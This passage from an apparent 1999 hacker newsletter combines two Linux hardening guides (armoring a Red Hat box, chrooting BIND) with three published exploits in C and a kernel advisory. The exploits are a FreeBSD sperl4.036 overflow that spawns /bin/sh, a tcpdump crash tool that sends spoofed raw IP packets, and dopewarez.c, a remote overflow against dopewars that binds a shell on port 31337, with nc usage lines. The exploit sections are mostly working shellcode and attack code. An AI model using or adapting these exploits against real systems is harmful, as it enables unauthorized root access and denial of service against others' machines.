platform. By connecting to the Internet to provide critical services,
they also become targets of opportunity. To help protect these Linux
systems, this article covers the basics of securing a Linux box. The
examples provided here are based on Red Hat 5.x, but should apply to most
Linux distributions.

Installation The best place to start in armoring your system is at
the beginning, OS installation. Since this is a production system, you
cannot trust any previous installations. You want to start with a clean
installation, where you can guarantee the system integrity. Place your
system in an isolated network. At no time do you want to connect this box
to an active network nor the Internet, exposing the system to a possible
compromise. I personally witnessed a system hacked by a script kiddie
within 15 minutes of connecting to the Internet. To get critical files
and patches later, you will need a second box that acts as a go between.
This second box will download files from the Internet, then connect to
your isolated, configuration "network" to transfer critical files.

Once you have placed your future Linux box in an isolated network, you are
ready to begin. The first step is selecting what OS package to load. The
idea is to load the minimum installation, while maintaining maximum
efficiency. Chose the installation that suits your needs, but
deselect package you will not be using. The less software that resides on
the box, the fewer potential security exploits or holes. This means if
you do not need the News or Real Audio Server, don't install it. The nice
thing about Linux is it is easy to add packages later. Regardless of
which installation you choose, I would add the manual pages and HOWTO
docs. I find the on-line man pages and docs to be a critical resource
that add little risk to your system.

During the installation process, you will be asked to partition your
system. I always like to make root as big as possible and just throw
everything in there, then you do not run out of room in the future.
However, we do need several partitions to protect the root drive.
If we were to fill the root partition with data, such as logging or email,
we would cause a denial of service, potentially crashing the system.

Therefore, I always recommend a separate partition for /var, this is where
all the system logging and email goes. By isolating the /var partition,
you protect your root partition from overfilling. I've found 400 MB to
be more then enough for /var. You may also consider making a
separate partition for specific application purposes, especially
applications that store extensive logging. With such a setup, your
partitions would look as follows:

/ - everything else
/var - 200 MB swap - (max 127 MB of RAM)


Once the system has rebooted after the installation, be sure to install
the recommend security patches. For Red Hat, you can find these security
patches at http://www.redhat.com/support. An excellent example of this is
the security update for wu-ftpd Without these patches, your system can be
easily compromised. Be sure to use your go between box to get the
patches, the Linux box should always remain on an isolated network.
Patches are critical to armoring a system and should always be updated.
BUGTRAQ@netspace.org is an excellent source for following bugs and system
patches. For Red Hat, once you download the rpm, you can easily update
your system using the following syntax.

rpm -Uvh wu-ftpd-2.4.2b18-2.1.i386.rpm

For systems that are already on-line, you can ftp the rpm and install it
at the same time, using the following syntax.

rpm -Uvh ftp://updates.redhat.com/5.2/i386/wu-ftpd-2.4.2b18-2.1.i386.rpm

Eliminating Services
Once you have loaded the installation package, patches, and rebooted, we
are now ready to armor the operating system. Armoring consists mainly of
turning off services, adding logging, tweaking several files, and
configuring TCP Wrappers. First we will begin with turning off services.

By default, Linux is a powerful operating system that executes many useful
services. However, most of these services are unneeded and pose a
potential security risk. The first place to start is /etc/inetd.conf. This
file specifies which services the /usr/sbin/inetd daemon will listen
for. By default, /etc/inetd.conf is configured for a variety of services,
you most likely only need two, ftp and telnet. You eliminate the remaining
unnecessary services by commenting them out (example A). This is
critical, as many of the services run by inetd pose serious security
threats, such as popd, imapd, and rsh. Confirm what you have commented
out with the following command (this will show you all the services that
were left uncommented)

grep -v "^#" /etc/inetd.conf

The next place to start are the .rc scripts, these scripts determine what
services are started by the init process. For Red Hat, you will find these
scripts in /etc/rc.d/rc3.d. To stop a script from starting, replace the
capital S with a small s. That way you can easily start the script
again just by replacing the small s with a capital S. Or, if you prefer,
Red Hat comes with a great utility for turning off these services. Just
type "/usr/sbin/setup" at the command prompt, and select "System
Services", from there you can select what scripts are started during the
boot up process. Another option is chkconfig, which you will find on most
distributions. The following startup scripts may be installed by default
but are not critical to system functioning. If you don't need them, turn
these scripts off. The numbers in the names determine the sequence of
initialization, they may vary based on your distribution and version.

S05apmd (You only need this script for laptops)
S10xntpd (Network time protocol)
S15sound
S20bootparamd (Used for diskless clients, you probably don't need this
vulnerable service)
S20nfs (Use for NFS server, do not run unless you absolutely have to). S
20rusersd (Try to avoid running any r services, they provide too much
information to remote users).
S20rwalld
S20rwhod
S25innd (News server)
S25squid (Proxy server)
S30sendmail (You can still send email if you turn this script off, you
just will not be able to receive or relay).
S30ypbind (Required if you are a NIS client)
S34yppasswdd (Required if you are a NIS server, this is an extremely
vulnerable service)
S35dhcpd
S35ypserv (Required if you are a NIS server, this is an extremely
vulnerable service)
S40portmap (This startup script is required if you have any rpc services,
such as NIS or NFS)
S40snmpd (SNMP daemon, can give remote users detailed information
about your system)
S55routed (RIP, don't run this unless you REALLY need it)
S55named (DNS server. If you are setting up DNS, upgrade to Bind 8.2,
http://www.isc.org/bind.html)
S60atd (Used for the at service, similar to cron, by not required by
the system)
S60lpd (Printing services)
S72amd (AutoMount daemon, used to mount remote file systems)
S75gated (used to run other routing protocols, such as OSPF)
s85httpd (Apache webserver, I recommend you remove the installed version
and upgrade to the latest version, http://www.apache.org)
S95nfsfs (This is the nfs client, used for mounting filesystems from a
nfs server)
S95pcmcia (You only need this script for laptops)

To see how many services are running before you change the startup
scripts, type

ps aux | wc - l

Once you are done with the installation and have turned off the startup
scripts, type the command again and compare how the number of services
have decreased. The fewer services running, the better.

Logging and Tweaking
Once you have eliminated as many services as possible, we want to enable
logging. All system logging occurs in /var/log. By default, Linux has
excellent logging, except for ftp. You have two options for logging for
ftp, configure /etc/ftpaccess file or edit
/etc/inetd.conf. I prefer to edit /etc/inetd.conf, as it is simpler
(i.e. harder to mess up :). Edit /etc/inetd.conf as follows to ensure
full logging of all FTP sessions.

ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -L -i -o

--- From the man pages ---

If the -l option is specified, each ftp session is logged in the syslog
If the -L flag is used, command logging will be on by default as soon as
the ftp server is invoked. This will cause the server to log all USER
ommands, which if a user accidentally enters a password for that command
instead of the username, will cause passwords to be logged via syslog.
If the -i option is specified, files received by the ftpd(8) server will
be logged to the xferlog(5). If the -o option is specified, files
transmitted by the ftpd(8) server will be logged to the xferlog(5).

--- snip snip ---


Next comes tweaking. This involves various file administration. The first
thing we want to do is create the file /etc/issue. This file is an ASCII
text banner that appears for all telnet logins (example B). This legal
warning will appear whenever someone attempts to login to your system. If
you want to continue using the same /etc/issue file, you will have to
modify /etc/rc.d/rc3.d/S99local. By default, Linux creates a new
/etc/issue file on every reboot.

We want to do two things to secure our /etc/passwd file (this is the
database file that holds your user accounts and passwords). First, we
want to convert our system to use /etc/shadow, this securely stores
everyone's password in a file only root can access. This protects
your passwords from being easily accessed and cracked (one of the first
exploits a hacker looks for). All you have to do is type the following
command as root. This automatically converts your encrypted passwords to
the /etc/shadow file. Of all the actions you can take to secure your
system, I consider this to be one of the most important.

pwconv

The second step is to remove most of the default system accounts in
/etc/passwd. Linux provides these accounts for various system activities
which you may not need. If you do not need the accounts, remove them.
The more accounts you have, the easier it is to access your system.
An example is the "news" account. If you are not running nntp, a news
group server, you do not need the account (be sure to update
/etc/cron.hourly, as this looks for the user "news"). Also, make sure you
remove the "ftp" account, as this is the account used for anonymous ftp.
From the man pages.

man ftpd:

Ftpd authenticates users according to four rules.

4) If the user name is ``anonymous'' or ``ftp'', an anonymous
ftp account must be pre-sent in the password file (user ``ftp'').
In this case the user is allowed to log in by specifying any
password (by convention this is given as the client host's name).

For an example of my /etc/passwd file, check out example C.


We also want to modify the file /etc/ftpusers (example D). Any account
listed in this file cannot ftp to the system. This restricts common system
accounts, such as root or bin, from attempting ftp sessions. Linux has the
file by default. Ensure that root stays in this file, you never want root
to be able to ftp to this system. Ensure that any accounts that need to
ftp to the box are NOT in the file /etc/ftpusers.

Also, ensure that root cannot telnet to the system. This forces users to
login to the system as themselves and then su to root. The file
/etc/securetty lists what ttys root can connect to. List only tty1, tty2,
etc in this file, this restricts root logins to local access only.
ttyp1, ttyp2, are pyseudo terminals, they allow root to telnet to the
system remotely (example E).


TCP Wrappers
TCP Wrappers are a must, no armored system should be without it. Created
by Wietse Venema, TCP Wrappers are a binary that wraps itself around inetd
services, such as telnet or ftp. With TCP Wrappers, the system launches
the wrapper for inetd connections, which logs all attempts and verifies
the attempt against a access control list. If the connection is permitted,
TCP Wrappers hands the connection to the proper binary, such as telnet. If
the connection is rejected by the access control list, then the connection
is dropped. Fortunately for us Linux users, TCP Wrappers is already
installed, the only thing left for us to do is edit the /etc/hosts.allow
and /etc/hosts.deny file. These files determine who can and cannot access
our systems. Also, TCP Wrappers allows us to do fancy things, such as
banners or spawn additional programs, such as safe_finger. The syntax is
relatively simple. Put the IP address or networks in /etc/hosts.allow
that you want to permit connections from. Put IP addresses or networks in
/etc/hosts.deny that you do not want to permit access. By default, Linux
allows connections from everyone, so you will need to modify these files.
2 recommendations when working with TCP Wrappers.

1.Use IP addresses and networks instead of domain names. 2.Set
up /etc/hosts.deny to deny everything (ALL), then permit only specific
sites with /etc/hosts.allow.

For examples on how to setup /etc/hosts.allow and /etc/hosts.deny, see
example F.



For the Truly Paranoid I consider the measures discussed above
absolutely essential. By following these steps, you have greatly improved
your system's security, congratulations! Unfortunately, your system is
not 100% secure, nor will it ever be. So, for the truly paranoid, I have
added some additional steps you can take.

First we will create the wheel group. The wheel group is a group of
select individuals that can execute powerful commands, such as /bin/su. By
limiting the people that can access these commands, you enhance the system
security. To create the group, vi the file /etc/group, create the
group wheel, and add the system admins to the group. Then identify
critical system binaries, such as /bin/su. Change the group ownership to
wheel, and the permissions to owner and group executable only (be sure to
maintain the suid or guid bit for specific binaries). For /bin/su, the
commands would be:

/bin/chgrp wheel /bin/su /bin/chmod 4750 /bin/su

Second, we will lock down the files .rhosts, .netrc, and /etc/hosts.equiv.
The r commands use these files to access systems. To lock them down,
touch the files, then change the permissions to zero, locking them down.
This way no one can create or alter the files. For example,

/bin/touch /.rhosts /.netrc /etc/hosts.equiv /bin/chmod 0 /.rhosts
/.netrc /etc/hosts.equiv

Third, we make some modifications to PAM. PAM (Pluggable Authentication
Modules) is a suite of shared libraries that enable you to choose how
applications authenticate users. To learn more about PAM, check out
ftp://ftp.us.kernel.org/pub/linux/libs/pam/Linux-PAM-html/pam.html. There
are a variety of tweaks that you can make to your system. Here is an
example of how to convert your encrypted passwords to use MD5, making your
/etc/shadow file far more difficult to crack.

Go to /etc/pam.d directory, where you will find all the configuration
files for different binaries that require authentication. Most of the
configuration files will have the following entry. password
required /lib/security/pam_pwdb.so nullok use_authtok

All you need to do is find all the configuration files that have this
entry, and add "md5" to the end, so it looks like this.
password required /lib/security/pam_pwdb.so nullok use_authtok md5

For my RedHat 5.1 system, I had to edit this line in the following
configuration files in /etc/pam.d
chfn
chsh
login
passwd
rlogin
su
xdm

Last thing we can do is protect our system from physical access. This
mainly consists of setting up a password for our BIOS. Also, you can
password protect your system during boot-up by configuring /etc/lilo.conf
with a password (password=xxx) where xxx is your password. However, keep
in mind, once someone has physical access to your system, this is no
guaranteed way to protect it.


Conclusion We have covered some of the more basic steps involved in
armoring a Linux box (Red Hat distribution). The key to a secure system is
having the minimal software installed, with protection in layers, such as
TCP Wrappers. There are many additional steps that can be taken, such as
ipchains (firewall software), ssh (encrypted rlogin, rcp, and telnet),
tripwire (monitor changes in system binaries), and swatch (automated log
monitoring and alerts). Remember, no system is truly 100% secure. However,
with the steps outlined above, you greatly reduce the security risks.


Author's bio

Lance Spitzner enjoys learning by blowing up his Unix systems at home.
Before this, he was an Officer in the Rapid Deployment Force, where he
blew up things of a different nature. You can reach him at lance@spitzner.net .


@HWA


64.0 Securing DNS (Linux version)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

There have been a large number of problems with BIND because of the size
and complexity of the functions it performs. As a result, a number of
attacks (and here ) are beginning to emerge that target this service
specifically, some of which can allow full remote access to the target
host. Because systems running DNS servers are so critical to the network
infrastructure, it is vital that these systems do not get compromised.

To further this, I've prepared this short document that describes how to
set up your BIND 8.x server in a chroot() environment under RedHat Linux
(but should apply to others as well). This document is largely inspired by
my friend Adam Shostack and his paper on the identical subject
matter (which covers Solaris). Please read his paper (and check out his
entire page which contains good reading) after you've been here.

NOTE: This is a living document and I expect changes and small errors to
be discovered over time. My DNS server is very small and handles a limited
number of zones and traffic. It is quite possible that the information I
supply here does not work for larger sites. If this is your case
please write me and tell me what is broken so I can change it here! Your
input will be given full credit and will help everyone who wishes to
contain the beast we call BIND.

Linux NOTE: Although I do all my development on RedHat Linux, my
WWW/SMTP/DNS server is in fact OpenBSD. This document was originally
written for OpenBSD usage, but was modified to des

  
cribe the procedure
under Linux (which is only slightly different). Because of this
though, I openly admit that I have very little experience running BIND
under Linux in a chroot() environment. While I believe the information in
this area to be accurate it may in fact vary somewhat from version to
version of Linux. If this is the case then please write me and tell me! I
would like to make this document as accurate as possible and this can only
be done with your help.



Step One: Get The Software and Install

Go to the ISC FTP Site and download the latest version of BIND (These
directions have only been tested on BIND version 8.x, which is the version
you should be running anyway).

Install the software per the directions included with the package.

Go to Obtuse Systems's FTP site where you need to download their free
program called: holelogd (and some other neat utilities). This program
allows you to create a /dev/log socket under a chroot environment so
syslog will work from named once it has been contained. OpenBSD's
syslogd already has a feature to do this built in ("syslogd -a
/chroot/dev/log"), but Linux does not (however it should). This program
will emulate this feature in OpenBSD.

Install holelogd per the instructions (usually in /usr/local/sbin).


Step Two: Make static named and named-xfer binaries

After the build and install you will need to make a statically linked
version of the program. This is easily accomplished by going into the
directory /src/port/linux under BIND and editing the file Makefile.set.

Change the line:

'CDEBUG= -O2 -g'

To:

'CDEBUG= -O2 -static'

Go to the top of the BIND source directory and do a "make clean"
followed by a "make". Go onto the next step where you will copy the
files to the chroot() directory.

For the uninitiated, a statically linked program is one that does not
perform dynamic loading of libraries. For a chroot() environment it means
that the executable will be "self-contained" and will not cause an error
if you are missing a library file. While it is not necessary to have
statically linked files in the chroot() environment, it often makes setup
easier. I prefer to have all network daemons statically linked for this
reason.


Step Three: Make a Directory for BIND

Create a directory for BIND to be chroot()ed in. This can be as simple as
/chroot/named and will be the "pseudo" root where BIND will reside. The
ultra-paranoid may even want to put this chroot jail on a separate physical
volume.

Under this directory you will need to create the following directory structure:

/dev
/etc
/namedb
/usr
/sbin
/var
/run

Under each directory you will need to copy the following files and/or perform
the following commands:

/
None

/etc
copy named.conf from /etc
copy localtime from /etc (so named logs correct timezone in syslog)
create /etc/group file with named GID as the only entry (Thanks Bernhard
Weisshuhn <bkw@weisshuhn.de>)

/etc/namedb
copy all zone databases and files from /etc/namedb

/dev
mknod ./null c 1 3; chmod 666 null (For other Linux variants, look at
/dev/MAKEDEV to get the mknod command)

/usr/sbin
copy statically linked named and named-xfer binary from the BIND
src/bin/named and src/bin/named-xfer directories

/var/run
None

Additionally, Bernhard Weisshuhn <bkw@weisshuhn.de>, writes that if you have
custom logging directories specified that you need to be sure to make these
as well (/var/log). Although named won't crash, it will complain.


Step Four: Add named user and group

Add the user named to the /etc/passwd and to the /etc/group files. This
will be the UID/GID that the server runs under.

You should now go to the /chroot/named/var/run directory and make it
writable by named so the named.pid file can be written to upon startup.
This is used by the ndc command to control named's operation.

At this point you may want to go into your chroot named area and chown -R
named.named on the /etc/namedb directory. This allows named to dump cache
and statistical information if you send it the proper signal (kill -INT
<PID>). This change should not significantly effect the security of
your chroot() setup. Leaving it owned as root won't allow named to write
out this information (remember named now runs under a new UID and no
longer root), but still allows named to function. A second option is to
change the permissions to allow writing to this directory, but leaving it
owned by root. This could also work but you need to be careful with doing
so to ensure normal users can't modify your named records!

IMPORTANT: ** DO NOT USE AN EXISTING UID/GID to run named under (i.e.
"nobody"). It is always a bad idea to use an existing UID/GID under a
chroot environment as it can impact the protection offered by the service.
Make a separate UID/GID for every daemon you run under chroot() as a
matter of practice.


Step Five: Edit startup scripts

Linux uses SYS V style init files and there are several places to put the
named commands to run. The cleanest location is in the named init script
located in /etc/rc.d/init.d/named. In there you will find a section where
named is started. You need to add and change a couple lines.

1) Put in a line before executing named to start up holelogd. holelogd
needs to be told where to put the remote socket, this should be your
chroot named dev directory made above. It should look something like
this:

# Start daemons.
echo -n "Staring holelogd: "
daemon /usr/local/sbin/holelogd /chroot/named/dev/log
echo
echo -n "Starting named: "
daemon named
echo
touch /var/lock/subsys/named
;;


2) You will also need to change the startup flags for BIND. Version 8.x
has a feature where you can change the user and group ID after binding.
This is where you specify your UID/GID you assigned to BIND above:


# Start daemons.
echo -n "Staring holelogd: "
daemon /usr/local/sbin/holelogd /chroot/named/dev/log
echo
echo -n "Starting named: "
daemon /chroot/named/usr/sbin/named -u named -g named -t /chroot/named
echo
touch /var/lock/subsys/named
;;

3) named ships with a script called "ndc" which is used to control named
operations. You will need to edit this file and change the location of
the variable PIDFILE from /var/run/named.pid to /chroot/named/var/run/named.pid.


Step Six: Test it out

Start up holelogd by typing:

/usr/local/sbin/holelogd /chroot/named/dev/log

Go into this directory and ls -al. You should see (the date is insignificant):

srw-rw-rw- 1 root wheel 0 Jan 01 12:00 log

The "s" bit is set to indicate that the file is a socket. This is how named
will write to syslog from within the chroot() jail.

Now type:

/chroot/named/usr/sbin/named -u named -g named -t /chroot/named

If all goes well named will start and your logs will indicate that named is
"Ready to answer queries."

Perform other DNS tests as appropriate to ensure operation, then reboot your
system and verify the setup. BIND should have started and reported it
chroot()ed to to directory and changed UID/GID. You can use a program such
as lsof to list out the owner of all network sockets on the host. The owner
should be your named UID/GID.

When everything is working you should either rename /etc/namedb to something
like /etc/namedb.orig and chmod 000 /usr/sbin/named to ensure that the old
version doesn't get run by mistake. Reboot your system and assuming everything
is correct your named will now be chroot()ed.


Thanks

Thanks to the following people who made suggestions and submitted corrections:

Steinar Haug <sthaug@nethelp.no> - Comments concerning blocking of TCP to
port 53.

Bernhard Weisshuhn <bkw@weisshuhn.de> - Comments pertaining to Linux install
(typos, adding /etc/group entry).

Marc Heuse <Marc.Heuse@mail.deuba.com> - Comments pertaining to logging and
renaming of old binaries and directories.

Jan Gruber <jgr@tpnet.de> - Comments pertaining to permissions on
/chroot/named/var/run and changes to the ndc control script.

All Material Copyright ©1996-99 Craig H. Rowland and Psionic Software Systems
http://www.psionic.com/misc/contact
Site last updated: 1999/03/24

@HWA

65.0 Exploit for FreeBSD sperl4.036 by OVX
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.hack.co.za


/************************************************************/
/* Exploit for FreeBSD sperl4.036 by OVX */
/************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define BUFFER_SIZE 1400
#define OFFSET 600

char *get_esp(void) {
asm("movl %esp,%eax");
}
char buf[BUFFER_SIZE];

main(int argc, char *argv[])
{
int i;
char execshell[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

for(i=0+1;i<BUFFER_SIZE-4;i+=4)
*(char **)&buf[i] = get_esp() - OFFSET;

memset(buf,0x90,768+1);
memcpy(&buf[768+1],execshell,strlen(execshell));

buf[BUFFER_SIZE-1]=0;

execl("/usr/bin/sperl4.036", "/usr/bin/sperl4.036", buf, NULL);
}

666.0 tcpdump bug 3.4a? by BLADI (bladi@euskalnet.net);
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Section 666 there thats as halloweeny as we get - Ed ...

From http://www.hack.co.za


/*
------------------------------------------------------------------------------
tcpdump bug 3.4a? by BLADI (bladi@euskalnet.net);
---------------->
On receiving an ip packet with Protocol-4 and ihl=0, tcpdump enters
an infinite loop within the procedure ip_print() from file print_ip.c
This happens because the header length (ihl) equals '0' and tcpdump
tries to print the packet
------------------------------------------------------------------------------
I've tried the bug in diferent OS's

Linux:
SuSE 6.x:
K2.0.36 tcpdump consumes all the system memory
K2.2.5 in less than a minute and hangs the system
K2.2.9 or sometimes gives an error from the bus
K2.3.2
K2.3.5
RedHat 5.2:
K2.?.? tcpdump makes a segmentation fault to happen
6.0:
K2.2.9 and it sometimes does a coredump

Debian:
K2.2.? tcpdump makes a segmentation fault to happen
and does a coredump

Freebsd: Segmentation fault & Coredump Thanks to: wb^3,Cagliostr
Solaris: Segmentation fault & Coredump Thanks to: acpizer
Aix: ?
Hp-UX: ?

-----------------------------------------------------------------------------
This tests have been carried out in loopback mode, given that protocol 4
won't get through the routers. It would be interesting to perform the attack
remotely in an intranet. But i do not have access to one.
------------------------------------------------------------------------------

Thanks to:
the channels:
#ayuda_irc, #dune, #linux, #networking, #nova y #seguridad_informática.
from irc.irc-hispano.org

Special thanks go to:
Topo[lb], ^Goku^, Yogurcito, Pixie, Void, S|r_|ce, JiJ79, Unscared etc...

Thanks to Piotr Wilkin for the rip base code ;)
And big thanks go to TeMpEsT for this translation.

------------------------------------------------------------------------------
I've found two ways of solving the problem
Solution 1

execute: tcpdump -s 24

Solution 2 Apply this little patch.

diff -r -p /tcpdump-3.4a6/tcpdump-3.4a6/print-ip.c /tcpdump-3.4a7/tcpdump-3.4a6/print-ip.c
*** /tcpdump-3.4a6/tcpdump-3.4a6/print-ip.c Wed May 28 21:51:45 1997
--- /tcpdump-3.4a7/tcpdump-3.4a6/print-ip.c Tue Oct 27 05:35:27 1998
*************** ip_print(register const u_char *bp, regi
*** 440,446 ****
(void)printf("%s > %s: ",
ipaddr_string(&ip->ip_src),
ipaddr_string(&ip->ip_dst));
- ip_print(cp, len);
if (! vflag) {
printf(" (ipip)");
return;
--- 440,445 ----

*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#include <errno.h>
#include <netdb.h>
struct icmp_hdr
{
struct iphdr iph;
char text[15];
}
encaps;
int in_cksum(int *ptr, int nbytes)
{
long sum;
u_short oddbyte, answer;
sum = 0;
while (nbytes > 1)
{
sum += *ptr++;
nbytes -= 2;
}
if (nbytes == 1)
{
oddbyte = 0;
*((u_char *)&oddbyte) = *(u_char *)ptr;
sum += oddbyte;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
struct sockaddr_in sock_open(int socket, char *address,int prt)
{
struct hostent *host;
struct sockaddr_in sin;

if ((host = gethostbyname(address)) == NULL)
{
perror("Unable to get host name");
exit(-1);
}
bzero((char *)&sin, sizeof(sin));

sin.sin_family = PF_INET;
sin.sin_port = htons(prt);
bcopy(host->h_addr, (char *)&sin.sin_addr, host->h_length);
return(sin);
}

void main(int argc, char **argv)
{
int sock, i,k;
int on = 1;
struct sockaddr_in addrs;
printf("\t\tTCPDumper Ver 0.2 \n\t\t\tBy Bladi\n");
if (argc < 3)
{
printf("Uso: %s <ip_spoof> <dest_ip> \n", argv[0]);
exit(-1);
}
encaps.text[0]=66; encaps.text[1]=76; encaps.text[2]=65; encaps.text[3]=68;
encaps.text[4]=73; encaps.text[5]=32; encaps.text[6]=84; encaps.text[7]=90;
encaps.text[8]=32; encaps.text[9]=84; encaps.text[10]=79;encaps.text[11]=32; encaps.text[12]=84;encaps.text[13]=79;encaps.text[14]=80;encaps.text[15]=79;
sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1)
{
perror("Can't set IP_HDRINCL option on socket");
}
if (sock < 0)
{
exit(-1);
}
fflush(stdout);
addrs = sock_open(sock, argv[2], random() % 255);
encaps.iph.version = 0;
encaps.iph.ihl = 0;
encaps.iph.frag_off = htons(0);
encaps.iph.id = htons(0x001);
encaps.iph.protocol = 4;
encaps.iph.ttl = 146;
encaps.iph.tot_len = 6574;
encaps.iph.daddr = addrs.sin_addr.s_addr;
encaps.iph.saddr = inet_addr(argv[1]);
printf ("\t DuMpInG %s ---> %s \n",argv[1],argv[2]);
if (sendto(sock, &encaps, 1204, 0, (struct sockaddr *)&addrs, sizeof(struct sockaddr)) == -1)
{
if (errno != ENOBUFS) printf("Error :(\n");
}
fflush(stdout);
close(sock);
}


67.0 dopewarez.c exploit for Dopewars
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://packetstorm.securify.com



/*
* dopewarez.c - Exploit for dopewars-1.4.4 client/server. Produces a shell.
*
* URL: http://bellatrix.pcl.ox.ac.uk/~ben/dopewars/
*
* C0de by nuuB [Sep 25, 1999]. Linux version.
*
* 0wn a server:
*
* (dopewarez [<offset>] | nc <server> 7902)& ; sleep 5 ; nc <server> 31337
*
* 0wn a client using a bogus server:
*
* (dopewarez 2285 | nc -l -p 7902) & ; wait4client ; nc <client> 31337
*
* Overflow occurs in ProcessMessage().
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>

#define EGGSIZE 598
#define EIP_OFFSET 208
#define FIRST_OFFSET 236

#define WRD_STACK_OFFSET 0x0bb0 /* approximate for server */

#define OWNED_FIRST 0xbffffffc-132 /* 132 = offset for Player->next */

#define C0DE_SIZE 213

char c0de[]="\xbc\xfc\xff\xff\xbf\xeb\x02\xeb\x0c\xe8\xf9\xff\xff\xff\x2f\x62"
"\x69\x6e\x2f\x73\x68\x5d\x31\xc0\x89\xc3\x89\xc1\xb0\x46\xcd\x80"
"\x31\xc9\x51\x41\x51\x41\x51\x89\xe1\x31\xdb\x43\x31\xc0\x04\x66"
"\xcd\x80\x8d\x64\x24\x0c\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\x7a"
"\x69\x04\x02\x66\x50\x89\xe3\x31\xc0\x04\x10\x50\x53\x57\x89\xe1"
"\x31\xdb\xb3\x02\x31\xc0\x04\x66\xcd\x80\x85\xc0\x75\x6f\x8d\x64"
"\x24\x1c\x31\xc0\x50\x57\x89\xe1\x31\xdb\xb3\x04\x31\xc0\x04\x66"
"\xcd\x80\x8d\x64\x24\x08\x31\xc0\x04\x10\x50\x89\xe3\x8d\x64\x24"
"\xf0\x89\xe1\x53\x51\x57\x89\xe1\x31\xdb\xb3\x05\x31\xc0\x04\x66"
"\xcd\x80\x8d\x64\x24\x20\x89\xc7\x89\xfb\x31\xc9\xb0\x3f\xcd\x80"
"\x89\xfb\x31\xc9\x41\xb0\x3f\xcd\x80\x89\xfb\x31\xc9\x80\xc1\x02"
"\xb0\x3f\xcd\x80\x31\xc0\x88\x45\x07\x89\x6d\x08\x89\x45\x0c\x8d"
"\x55\x0c\x8d\x4d\x08\x89\xeb\x31\xc0\xb0\x0b\xcd\x80\x31\xdb\x31"
"\xc0\xb0\x01\xcd\x80";

char egg[EGGSIZE+1];

void bail(char *s) { puts(s); exit(1); }

char *htol_LEstr(unsigned long num) {
static unsigned char buf[5];
unsigned long n;

n=htonl(num);
buf[0]=(n>>24)&0xff;
buf[1]=(n>>16)&0xff;
buf[2]=(n>>8)&0xff;
buf[3]=n&0xff;
buf[4]=0;

if(strlen(buf) != 4) bail("NULL detected!");
if(strchr(buf, '^')) bail("caret detected!");

return buf;
}

int main(int argc, char *argv[]) {
unsigned long eip;

/* Try to land splat in the middle of the NOPs after FIRST_OFFSET */
eip=(unsigned long)((char *)&eip-WRD_STACK_OFFSET);
eip+=FIRST_OFFSET+4+(EGGSIZE-2-FIRST_OFFSET-4-C0DE_SIZE)/2;
if(argc >= 2) {
if(!strncmp("0x", argv[1], 2)) /* Absolute */
eip=strtoul(argv[1], 0, 0);
else
eip+=atoi(argv[1]);
}
fprintf(stderr, "Using EIP=0x%08x\n", eip);
memset(egg, 'A', EGGSIZE);
strncpy(egg+EIP_OFFSET-2, "\xeb\x04", 2);
strncpy(egg+EIP_OFFSET, htol_LEstr(eip), 4);
strncpy(egg+FIRST_OFFSET-2, "\xeb\x04", 2);
strncpy(egg+FIRST_OFFSET, htol_LEstr(OWNED_FIRST), 4);
memcpy(egg+EGGSIZE-2-C0DE_SIZE, c0de, C0DE_SIZE);
strcpy(egg+EGGSIZE-2, "^\n");

printf("%s", egg);
return 0;
}

68.0 Linux forged packets
~~~~~~~~~~~~~~~~~~~~

Date: Sat, 23 Oct 1999 18:34:56 +0200
Reply-To: Pavel Kankovsky <peak@ARGO.TROJA.MFF.CUNI.CZ>


The advisory did not explain what was the cause of the problem.
(Rant: Why? Will the following explanation help anyone who would not be
able to find out this piece of information himself to abuse the bug?)

As far as I can tell, the problem is this: anyone, including mere mortals,
is allowed to use TIOCSETD. Therefore anyone can set PPP line discipline
on a tty under his control and sent forged datagrams right into the kernel
network subsystem.

I do not believe there is any reason why mortals should ever be allowed to
use TIOCSETD (at least under Linux), therefore adding something like
"if (!suser()) return -EPERM;" under "case TIOCSETD:" in drivers/char/
tty_io.c should fix the problem for 2.0 (things are a bit more
complicated in 2.2 but we've already got a fix for 2.2). But remember:
you use it at your own risk, there is no guarantee this patch will not
kill all your family when used improperly.

--Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms]
"Resistance is futile. Open your source code and prepare for
assimilation."



NAME
user-rawip-attack
AUTHOR
Marc SCHAEFER <schaefer@alphanet.ch>
with the help of Alan COX (for the fix)
and of Andreas Trottmann <andreas.trottmann@werft22.com> for the
work-around idea.
VERSION
$Id: user-raw-IP,v 1.3 1999/10/22 08:33:10 schaefer Exp $

ABSTRACT
Forged packets can be send out from a Linux system, for example
for NFS attacks or any other protocol relying on addresses for
authentification, even when protected from the outside interfaces
by firewalling rules. Most of the time, existing firewalling
rules are bypassed. This requires at least a shell account on the
system.

IMPACT
Any local user can send any packet to any host from most Linux default
installations without of the use of any permission problem or
suid flaw. Basically, it corresponds to having write only permissions
to raw IP socket on the server machine.

IMMUNE CONFIGURATIONS
You are immune to this problem if one (or more) of the following
is true:

- you do not have local (shell) users

- SLIP and PPP are not compiled-in the kernel and either
are not available in /lib/modules/* as modules, or are
never loaded and kerneld/kmod is not available.

- you use deny-default configuration for your input firewall rules,
